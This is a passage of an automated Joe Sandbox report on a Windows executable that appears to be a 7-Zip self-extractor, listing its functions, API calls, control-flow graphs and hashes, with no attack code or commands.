                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??3@$FileTime$??2@AttributesSystemlstrlenmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 846840743-0
                                                                                            • Opcode ID: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                            • Instruction ID: c1b9adc2f16cc45d244a7c0b75b8b4a4f89234fa72cd4c12ee41ca3d86f3c48f
                                                                                            • Opcode Fuzzy Hash: 59d4a2ad1293f13bca9fbc2cc36a10c810479fd21a5ed498f46fbcb1fa619914
                                                                                            • Instruction Fuzzy Hash: 8F41C836904611AADB216F998881ABF7F6CEF40716F80403BED01B61D5DB3C9B4282DD
                                                                                            Function 00404405 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 91COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 00401F47: GetUserDefaultUILanguage.KERNEL32(00404416,00000000,00000020,?), ref: 00401F51
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32(00000000,00000020,?), ref: 00401FEC
                                                                                              • Part of subcall function 00401F9D: wsprintfW.USER32 ref: 00401FFD
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,00000000), ref: 00402012
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 00402017
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 00402032
                                                                                              • Part of subcall function 00401F9D: GetEnvironmentVariableW.KERNEL32(?,00000000,?), ref: 00402045
                                                                                              • Part of subcall function 00401F9D: GetLastError.KERNEL32 ref: 0040204C
                                                                                              • Part of subcall function 00401F9D: lstrcmpiW.KERNEL32(00000000,00000020), ref: 00402061
                                                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000000), ref: 00402071
                                                                                              • Part of subcall function 00401F9D: SetLastError.KERNEL32(00000000), ref: 00402098
                                                                                              • Part of subcall function 00401F9D: lstrlenA.KERNEL32(00413FD0), ref: 004020CC
                                                                                              • Part of subcall function 00401F9D: ??2@YAPAXI@Z.MSVCRT(00000000), ref: 004020E7
                                                                                              • Part of subcall function 00401F9D: GetLocaleInfoW.KERNEL32(?,00001004,?,0000001F), ref: 00402119
                                                                                              • Part of subcall function 00401F9D: ??3@YAXPAX@Z.MSVCRT(00000020), ref: 0040208F
                                                                                              • Part of subcall function 00401F9D: _wtol.MSVCRT ref: 0040212A
                                                                                              • Part of subcall function 00401F9D: MultiByteToWideChar.KERNEL32(00000000,00413FD0,00000001,00000000,00000002), ref: 0040214A
                                                                                            • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000000,00000000,?,?,?,?,00000000,00000020,?), ref: 0040448C
                                                                                            • wsprintfW.USER32 ref: 004044A7
                                                                                              • Part of subcall function 00402F6C: ??2@YAPAXI@Z.MSVCRT(00000018,00000000,004044E9,?,?,?,?,?,?,?,?,?,?,00000000,00000020,?), ref: 00402F71
                                                                                            • #17.COMCTL32(?,?,?,?,00000000,00000020,?), ref: 00404533
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$??2@$??3@EnvironmentVariablewsprintf$ByteCharDefaultFolderInfoLanguageLocaleMultiPathSpecialUserWide_wtollstrcmpilstrlen
                                                                                            • String ID: 7zSfxFolder%02d$IA
                                                                                            • API String ID: 3387708999-1317665167
                                                                                            • Opcode ID: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                            • Instruction ID: c443879f351b6d6d2b07c84fde6f3777072453d7374e8d7fc75fcfd2f507d9dd
                                                                                            • Opcode Fuzzy Hash: 205a0074c49e5804c32477661e2015f4351efd6e14d5df67bf5bfd9f1882f569
                                                                                            • Instruction Fuzzy Hash: E03140B19042199BDB10FFA2DC86AEE7B78EB44308F40407FF619B21E1EB785644DB58
                                                                                            Function 00408EA4 Relevance: 8.0, APIs: 3, Strings: 2, Instructions: 464COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 913 408ea4-408ebf call 40aef3 916 408ec1-408ecb 913->916 917 408ece-408f07 call 4065ea call 408726 913->917 922 408fd5-408ffb call 408d21 call 408b7c 917->922 923 408f0d-408f17 ??2@YAPAXI@Z 917->923 935 408ffd-409013 call 408858 922->935 936 40901e 922->936 925 408f26 923->925 926 408f19-408f24 923->926 927 408f28-408f61 call 4010e2 ??2@YAPAXI@Z 925->927 926->927 933 408f73 927->933 934 408f63-408f71 927->934 937 408f75-408fae call 4010e2 call 408726 call 40cdb8 933->937 934->937 944 409199-4091b0 935->944 945 409019-40901c 935->945 939 409020-409035 call 40e8da call 40874d 936->939 965 408fb0-408fb2 937->965 966 408fb6-408fbb 937->966 954 409037-409044 ??2@YAPAXI@Z 939->954 955 40906d-40907d 939->955 952 4091b6 944->952 953 40934c-409367 call 4087ea 944->953 945->939 957 4091b9-4091e9 952->957 975 409372-409375 953->975 976 409369-40936f 953->976 958 409046-40904d call 408c96 954->958 959 40904f 954->959 970 4090ad-4090b3 955->970 971 40907f 955->971 978 409219-40925f call 40e811 * 2 957->978 979 4091eb-4091f1 957->979 963 409051-409061 call 408726 958->963 959->963 987 409063-409066 963->987 988 409068 963->988 965->966 968 408fc3-408fcf 966->968 969 408fbd-408fbf 966->969 968->922 968->923 969->968 981 409187-409196 call 408e83 970->981 982 4090b9-4090d9 call 40d94b 970->982 977 409081-4090a7 call 40e959 call 408835 call 408931 call 408963 971->977 975->977 983 40937b-4093a2 call 40e811 975->983 976->975 977->970 1016 409261-409264 978->1016 1017 4092c9 978->1017 985 4091f7-409209 979->985 986 4092b9-4092bb 979->986 981->944 997 4090de-4090e6 982->997 999 4093a4-4093b8 call 408761 983->999 1000 4093ba-4093d6 983->1000 1013 409293-409295 985->1013 1014 40920f-409211 985->1014 1001 4092bf-4092c4 986->1001 994 40906a 987->994 988->994 994->955 1005 409283-409288 997->1005 1006 4090ec-4090f3 997->1006 999->1000 1080 4093d7 call 40ce70 1000->1080 1081 4093d7 call 40f160 1000->1081 1001->977 1011 409290 1005->1011 1012 40928a-40928c 1005->1012 1007 409121-409124 1006->1007 1008 4090f5-4090f9 1006->1008 1022 4092b2-4092b7 1007->1022 1023 40912a-409138 call 408726 1007->1023 1008->1007 1018 4090fb-4090fe 1008->1018 1011->1013 1012->1011 1025 409297-409299 1013->1025 1026 40929d-4092a0 1013->1026 1014->978 1024 409213-409215 1014->1024 1027 409267-40927f call 408761 1016->1027 1030 4092cc-4092d2 1017->1030 1028 409104-409112 call 408726 1018->1028 1029 4092a5-4092aa 1018->1029 1020 4093da-4093e4 call 40e959 1020->977 1022->986 1022->1001 1046 409145-409156 call 40cdb8 1023->1046 1047 40913a-409140 call 40d6f0 1023->1047 1024->978 1025->1026 1026->977 1049 409281 1027->1049 1028->1046 1050 409114-40911f call 40d6cb 1028->1050 1029->1001 1041 4092ac-4092ae 1029->1041 1036 4092d4-4092e0 call 408a55 1030->1036 1037 40931d-409346 call 40e959 * 2 1030->1037 1057 4092e2-4092ec 1036->1057 1058 4092ee-4092fa call 408aa0 1036->1058 1037->953 1037->957 1041->1022 1059 409158-40915a 1046->1059 1060 40915e-409163 1046->1060 1047->1046 1049->1030 1050->1046 1063 409303-40931b call 408761 1057->1063 1074 409300 1058->1074 1075 4093e9-4093fe call 40e959 * 2 1058->1075 1059->1060 1065 409165-409167 1060->1065 1066 40916b-409170 1060->1066 1063->1036 1063->1037 1065->1066 1071 409172-409174 1066->1071 1072 409178-409181 1066->1072 1071->1072 1072->981 1072->982 1074->1063 1075->977 1080->1020 1081->1020
                                                                                            APIs
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000018,?,?,00000000,?), ref: 00408F0F
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000028,00000000,?,?,00000000,?), ref: 00408F59
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@
                                                                                            • String ID: IA$IA
                                                                                            • API String ID: 1033339047-1400641299
                                                                                            • Opcode ID: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                                            • Instruction ID: ddcf9de22f7a46eeefc4975c1fab543939f34ce9f972055b0c78c556d294e1f5
                                                                                            • Opcode Fuzzy Hash: 6a22e71803ea0f4d69e2f58a84b042c4ce0c016d1f42beed39b79896576e25f5
                                                                                            • Instruction Fuzzy Hash: EF123671A00209DFCB14EFA5C98489ABBB5FF48304B10456EF95AA7392DB39ED85CF44
                                                                                            Function 00410CD0 Relevance: 7.5, APIs: 1, Strings: 4, Instructions: 23COMMONLIBRARYCODE
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1095 410cd0-410d1a call 410b9a free 1098 410d22-410d23 1095->1098 1099 410d1c-410d1e 1095->1099 1099->1098
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: free
                                                                                            • String ID: $KA$4KA$HKA$\KA
                                                                                            • API String ID: 1294909896-3316857779
                                                                                            • Opcode ID: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                            • Instruction ID: 889df95fe732b3a4b2d84b4ab476e7a54c7f97cead7299b76f73e2708a1c6c0a
                                                                                            • Opcode Fuzzy Hash: 376fb7dfafd84c32bde4dd83858b4f8e2c6f0d8f0efa40633e7013e4dd95691d
                                                                                            • Instruction Fuzzy Hash: C5F09271409B109FC7319F55E405AC6B7F4AE447183058A2EA89A5BA11D3B8F989CB9C
                                                                                            Function 004096C7 Relevance: 7.4, APIs: 3, Strings: 1, Instructions: 388COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1100 4096c7-40970f _EH_prolog call 4010e2 1103 409711-409714 1100->1103 1104 409717-40971a 1100->1104 1103->1104 1105 409730-409755 1104->1105 1106 40971c-409721 1104->1106 1109 409757-40975d 1105->1109 1107 409723-409725 1106->1107 1108 409729-40972b 1106->1108 1107->1108 1110 409b93-409ba4 1108->1110 1111 409763-409767 1109->1111 1112 409827-40983a call 40118a 1109->1112 1113 409769-40976c 1111->1113 1114 40976f-40977e 1111->1114 1120 409851-409876 call 408e4e ??2@YAPAXI@Z 1112->1120 1121 40983c-409846 call 409425 1112->1121 1113->1114 1116 409780-409796 call 4094e0 call 40969d call 40e959 1114->1116 1117 4097a3-4097a8 1114->1117 1137 40979b-4097a1 1116->1137 1118 4097b6-4097f0 call 4094e0 call 40969d call 40e959 call 4095b7 1117->1118 1119 4097aa-4097b4 1117->1119 1124 4097f3-409809 1118->1124 1119->1118 1119->1124 1133 409881-40989a call 4010e2 call 40eb24 1120->1133 1134 409878-40987f call 40ebf7 1120->1134 1144 40984a-40984c 1121->1144 1129 40980c-409814 1124->1129 1136 409816-409825 call 409403 1129->1136 1129->1137 1153 40989d-4098c0 call 40eb19 1133->1153 1134->1133 1136->1129 1137->1109 1144->1110 1157 4098c2-4098c7 1153->1157 1158 4098f6-4098f9 1153->1158 1161 4098c9-4098cb 1157->1161 1162 4098cf-4098e7 call 409530 call 409425 1157->1162 1159 409925-409949 ??2@YAPAXI@Z 1158->1159 1160 4098fb-409900 1158->1160 1163 409954 1159->1163 1164 40994b-409952 call 409c13 1159->1164 1165 409902-409904 1160->1165 1166 409908-40991e call 409530 call 409425 1160->1166 1161->1162 1179 4098e9-4098eb 1162->1179 1180 4098ef-4098f1 1162->1180 1170 409956-40996d call 4010e2 1163->1170 1164->1170 1165->1166 1166->1159 1181 40997b-4099a0 call 409fb4 1170->1181 1182 40996f-409978 1170->1182 1179->1180 1180->1110 1186 4099a2-4099a7 1181->1186 1187 4099e3-4099e6 1181->1187 1182->1181 1190 4099a9-4099ab 1186->1190 1191 4099af-4099b4 1186->1191 1188 4099ec-409a49 call 409603 call 4094b1 call 408ea4 1187->1188 1189 409b4e-409b53 1187->1189 1205 409a4e-409a53 1188->1205 1194 409b55-409b56 1189->1194 1195 409b5b-409b7f 1189->1195 1190->1191 1192 4099b6-4099b8 1191->1192 1193 4099bc-4099d4 call 409530 call 409425 1191->1193 1192->1193 1206 4099d6-4099d8 1193->1206 1207 4099dc-4099de 1193->1207 1194->1195 1195->1153 1208 409ab5-409abb 1205->1208 1209 409a55 1205->1209 1206->1207 1207->1110 1211 409ac1-409ac3 1208->1211 1212 409abd-409abf 1208->1212 1210 409a57 1209->1210 1213 409a5a-409a63 call 409f49 1210->1213 1214 409a65-409a67 1211->1214 1215 409ac5-409ad1 1211->1215 1212->1210 1213->1214 1225 409aa2-409aa4 1213->1225 1217 409a69-409a6a 1214->1217 1218 409a6f-409a71 1214->1218 1219 409ad3-409ad5 1215->1219 1220 409ad7-409add 1215->1220 1217->1218 1222 409a73-409a75 1218->1222 1223 409a79-409a91 call 409530 call 409425 1218->1223 1219->1213 1220->1195 1224 409adf-409ae5 1220->1224 1222->1223 1223->1144 1233 409a97-409a9d 1223->1233 1224->1195 1228 409aa6-409aa8 1225->1228 1229 409aac-409ab0 1225->1229 1228->1229 1229->1195 1233->1144
                                                                                            APIs
                                                                                            • _EH_prolog.MSVCRT ref: 004096D0
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,00000001), ref: 0040986E
                                                                                            • ??2@YAPAXI@Z.MSVCRT(00000038,?,00000000,00000000,00000001), ref: 00409941
                                                                                              • Part of subcall function 00409C13: ??2@YAPAXI@Z.MSVCRT(00000020,?,00000000,?,00409952,?,00000000,00000000,00000001), ref: 00409C3B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ??2@$H_prolog
                                                                                            • String ID: HIA
                                                                                            • API String ID: 3431946709-2712174624
                                                                                            • Opcode ID: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                                            • Instruction ID: da3614a8b55b1d80bdf53177d95d0cff5abf3d9c279f99a440b99522f39c568d
                                                                                            • Opcode Fuzzy Hash: 3a91edc2a80342029bdf13785710b8021a7be55c7c109f54d8d38dfd795fbdbc
                                                                                            • Instruction Fuzzy Hash: 53F13971610249DFCB24DF69C884AAA77F4BF48314F24416AF829AB392DB39ED41CF54
                                                                                            Function 00402844 Relevance: 6.4, APIs: 5, Instructions: 118stringCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1236 402844-40288e call 411c20 call 40dcfb lstrlenA * 2 1240 402893-4028af call 40dcc7 1236->1240 1242 4028b5-4028ba 1240->1242 1243 40297f 1240->1243 1242->1243 1244 4028c0-4028ca 1242->1244 1245 402981-402985 1243->1245 1246 4028cd-4028d2 1244->1246 1247 402911-402916 1246->1247 1248 4028d4-4028d9 1246->1248 1249 40293b-40295f memmove 1247->1249 1251 402918-40292b memcmp 1247->1251 1248->1249 1250 4028db-4028ee memcmp 1248->1250 1256 402961-402968 1249->1256 1257 40296e-402979 1249->1257 1252 4028f4-4028fe 1250->1252 1253 40297b-40297d 1250->1253 1254 40290b-40290f 1251->1254 1255 40292d-402939 1251->1255 1252->1243 1258 402900-402906 call 402640 1252->1258 1253->1245 1254->1246 1255->1246 1256->1257 1259 402890 1256->1259 1257->1245 1258->1254 1259->1240
                                                                                            APIs
                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 00402876
                                                                                            • lstrlenA.KERNEL32(?,?,00000000), ref: 0040287E
                                                                                            • memcmp.MSVCRT(?,?,?), ref: 004028E4
                                                                                            • memcmp.MSVCRT(?,?,?,?,00000000), ref: 00402921
                                                                                            • memmove.MSVCRT(?,?,00000000,?,00000000), ref: 00402953
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: lstrlenmemcmp$memmove
                                                                                            • String ID:
                                                                                            • API String ID: 3251180759-0
                                                                                            • Opcode ID: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                            • Instruction ID: d4955105e7b234ce255a009ef61331e6eb412850de833d0a73495bfba1f32545
                                                                                            • Opcode Fuzzy Hash: 67daa449d30d113f3b3b6daec82bd49862eba03341b4cd8aae73257779b8cae6
                                                                                            • Instruction Fuzzy Hash: 4A417F72E00209AFCF01DFA4C9889EEBBB5EF08344F04447AE945B3291D3B49E55CB55
                                                                                            Function 0040150B Relevance: 6.1, APIs: 4, Instructions: 100synchronizationthreadCOMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1263 40150b-401561 call 408726 call 401329 call 401429 CreateThread 1270 401563 call 40786b 1263->1270 1271 401568-401583 WaitForSingleObject 1263->1271 1270->1271 1273 401585-401588 1271->1273 1274 4015b7-4015bd 1271->1274 1277 40158a-40158d 1273->1277 1278 4015ab 1273->1278 1275 40161b 1274->1275 1276 4015bf-4015d4 GetExitCodeThread 1274->1276 1280 401620-401623 1275->1280 1281 4015d6-4015d8 1276->1281 1282 4015de-4015e9 1276->1282 1283 4015a7-4015a9 1277->1283 1284 40158f-401592 1277->1284 1279 4015ad-4015b5 call 407776 1278->1279 1279->1275 1281->1282 1286 4015da-4015dc 1281->1286 1287 4015f1-4015fa 1282->1287 1288 4015eb-4015ec 1282->1288 1283->1279 1289 4015a3-4015a5 1284->1289 1290 401594-401597 1284->1290 1286->1280 1293 401605-401611 SetLastError 1287->1293 1294 4015fc-401603 1287->1294 1292 4015ee-4015ef 1288->1292 1289->1279 1295 401599-40159c 1290->1295 1296 40159e-4015a1 1290->1296 1297 401613-401618 call 407776 1292->1297 1293->1297 1294->1275 1294->1293 1295->1275 1295->1296 1296->1292 1297->1275
                                                                                            APIs
                                                                                            • CreateThread.KERNELBASE(00000000,00000000,0040129C,00000000,00000000,?), ref: 0040154F
                                                                                            • WaitForSingleObject.KERNEL32(000000FF,?,00404AFB,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401570
                                                                                              • Part of subcall function 00407776: wvsprintfW.USER32(?,00000000,?), ref: 0040779A
                                                                                              • Part of subcall function 00407776: GetLastError.KERNEL32(?,00000000,0000FDE9), ref: 004077AB
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00000000,00402A50,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077D3
                                                                                              • Part of subcall function 00407776: FormatMessageW.KERNEL32(00001100,00000000,00402A50,00000000,00402A50,00000000,00000000,?,00000000,0000FDE9), ref: 004077E8
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(?,?,00000000,0000FDE9), ref: 004077FB
                                                                                              • Part of subcall function 00407776: lstrlenW.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407802
                                                                                              • Part of subcall function 00407776: ??2@YAPAXI@Z.MSVCRT(00000000,?,00000000,0000FDE9), ref: 00407817
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(00000000,?,?,00000000,0000FDE9), ref: 0040782D
                                                                                              • Part of subcall function 00407776: lstrcpyW.KERNEL32(-00000002,00402A50,?,00000000,0000FDE9), ref: 0040783E
                                                                                              • Part of subcall function 00407776: ??3@YAXPAX@Z.MSVCRT(00000000,00000000,?,00000000,0000FDE9), ref: 00407847
                                                                                              • Part of subcall function 00407776: LocalFree.KERNEL32(00402A50,?,00000000,0000FDE9), ref: 00407851
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: FormatMessagelstrcpylstrlen$??2@??3@CreateErrorFreeLastLocalObjectSingleThreadWaitwvsprintf
                                                                                            • String ID:
                                                                                            • API String ID: 359084233-0
                                                                                            • Opcode ID: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                            • Instruction ID: 87277f5b9ffc23463226fd0df2644328d4cfb3d5af9d6e9341eee715f5e270ad
                                                                                            • Opcode Fuzzy Hash: bfd7be960afb110040db1d822841385e4bb8395790a59903d21b295a7462948d
                                                                                            • Instruction Fuzzy Hash: 8231F171644200BBDA305B15DC86EBB37B9EBC5350F24843BF522F92F0CA79A941DA5E
                                                                                            Function 00401986 Relevance: 6.0, APIs: 4, Instructions: 27COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 1300 401986-401995 CreateDirectoryW 1301 4019c7-4019cb 1300->1301 1302 401997-4019a4 GetLastError 1300->1302 1303 4019b1-4019be GetFileAttributesW 1302->1303 1304 4019a6 1302->1304 1303->1301 1306 4019c0-4019c2 1303->1306 1305 4019a7-4019b0 SetLastError 1304->1305 1306->1301 1307 4019c4-4019c5 1306->1307 1307->1305
                                                                                            APIs
                                                                                            • CreateDirectoryW.KERNELBASE(004033CE,00000000,-00000001,004033CE,?,00404AC6,?,?,?,?,00404AC6,?), ref: 0040198D
                                                                                            • GetLastError.KERNEL32(?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000,?), ref: 00401997
                                                                                            • SetLastError.KERNEL32(000000B7,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019A7
                                                                                            • GetFileAttributesW.KERNELBASE(?,?,?,?,?,00404AC6,?,?,?,?,?,?,?,?,?,00000000), ref: 004019B5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.1812314642.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                            • Associated: 00000000.00000002.1812300314.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812332677.0000000000413000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812348112.0000000000417000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.000000000041A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000424000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            • Associated: 00000000.00000002.1812362563.0000000000432000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_400000_ErbgterT2R.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                            • String ID:
                                                                                            • API String ID: 635176117-0
                                                                                            • Opcode ID: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                            • Instruction ID: 5ae0be16486f509c6b40768ba71a6c1c2cea9be4331c5fc90c1b41dbeb0419e3
                                                                                            • Opcode Fuzzy Hash: 393c5bca226d6deeec728b25f224b431065b6bfcdefbc0a9fd36f7f362ffe78b
                                                                                            • Instruction Fuzzy Hash: D5E09AB0518250AFDE142BB4BD187DB3AA5AF46362F508932F495E02F0C33888428A89
                                                                                            Function 00404A44 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                            Download Yara Rule

                                                                                            Control-flow Graph

